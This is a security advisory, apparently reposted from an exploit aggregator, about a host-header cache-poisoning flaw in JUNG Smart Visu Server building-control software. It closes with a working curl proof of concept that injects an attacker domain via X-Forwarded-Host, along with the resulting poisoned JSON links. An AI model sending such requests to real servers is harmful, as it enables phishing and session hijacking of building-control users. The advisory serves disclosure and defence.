Share
## https://sploitus.com/exploit?id=PACKETSTORM:215522
JUNG Smart Visu Server 1.1.1050 Request URL Override
    
    
    Vendor: ALBRECHT JUNG GMBH & CO. KG
    Product web page: https://www.jung-group.com | https://www.jung.de
    Affected version: 1.1.1050
                      1.0.905
                      1.0.832
                      1.0.830
    
    Summary: The Smart Visu Server makes your intelligent building
    control convenient. With the user-friendly operating concept,
    you can control both the KNX system and other systems such as
    Philips Hue or Sonos on your mobile devices. You can likewise
    connect voice control to your KNX system with Amazon Alexa or
    Google Assistant via the Smart Visu Server.
    
    Desc: The vulnerability enables unauthenticated attackers to perform
    cache poisoning attacks by overriding the effective host in proxied
    requests through manipulation of the 'X-Forwarded-Host' header. When
    a malicious actor sends a request with an arbitrary value, the backend
    application or proxy fails to properly validate or sanitize this header,
    resulting in the generation of responses that incorporate the injected
    host as legitimate URLs or links, redirecting to the attacker's controlled
    domain. This can lead to persistent cache poisoning, where the tainted
    content is stored and served to unsuspecting users, facilitating phishing,
    session hijacking, or the distribution of malicious payloads.
    
    Tested on: Jetty(9.2.12.v20150709)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5970
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5970.php
    
    
    07.02.2026
    
    --
    
    
    $ curl "http://10.0.0.16:8080/rest/items?2sdh5r6txj=1" \
     -H "User-Agent: thricer-engine/1.6" \
     -H "X-Forwarded-Host: sillysec.com"
    
    HTTP/1.1 200 OK
    Content-Type: application/json
    Connection: close
    
    [{"link":"http://sillysec.com/rest/items/knxcom_action_2019829213754373","state":"NULL","type":"SwitchItem","name":"knxcom_action_2019829213754373","label":"Timer_ON","tags":["knxcommissioning","knxcom_action","{\"knxcom_action\":\"knxcom_action\",\"actionType\":\"time\",\"function_states\":[{\"function_name\":\"knxcom_function_201817101939842\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919141856124\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919144055744\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]}],\"icon\":\"schaltuhr\",\"sortindex\":{\"generic\":3},\"timer\":{\"time\":\"16:0\",\"weekdays\":{\"1\":true,\"2\":true,\"3\":true,\"4\":true,\"5\":true,\"6\":true,\"7\":true}}}"],"groupNames":["knxcom_group_201982922375216"]},{"link":
    ...
    ...